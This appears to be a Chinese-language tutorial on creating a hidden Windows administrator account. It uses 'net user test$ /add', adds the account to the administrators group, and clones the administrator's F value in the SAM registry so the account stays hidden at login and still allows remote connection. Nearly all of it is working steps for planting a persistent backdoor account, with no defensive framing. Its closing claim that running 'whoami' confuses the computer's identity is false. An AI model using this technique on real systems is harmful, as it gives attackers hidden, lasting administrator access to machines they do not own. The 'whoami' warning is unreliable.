新建隐藏用户:net user test$ admin /add
添加到管理组:net localgroup administrators test$ /add
net user无法查看隐藏用户
net localgroup administrators可以看到管理组的隐藏用户test$
计算机管理处也可以看到隐藏用户
超级隐藏——注册表中隐藏:
HKEY_LOCAL_MACHINE\SAM\SAM
无法展开,默认没有权限,需要点击左上角编辑-权限:
设置为对SAM文件夹的完全控制
关闭重新打开注册表,发现多了一些东西:
来到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
:
查看NAMES文件夹下面的用户的类型,将administrator的Users文件夹(用户类型和文件夹是对应的)的F值复制到test$用户中
将test$的键值(Users和Names文件夹下对应的文件)导出为1.reg和2.reg(也可以先导出再替换)
删除隐藏用户:net user test$ /del
双击导入reg文件即可,也可以进行一次重启,重启之后登陆界面隐藏账户依然不会显示,但是注册表里面依然可以发现。
test$拥有的是administrator的权限
实测是可以用于远程连接的
删除的我们只需进入注册表删除即可
注:千万不要cmd命令执行whoami,否则计算机会不知道自己究竟是谁,从而引发一些错误,有兴趣的读者可以自行尝试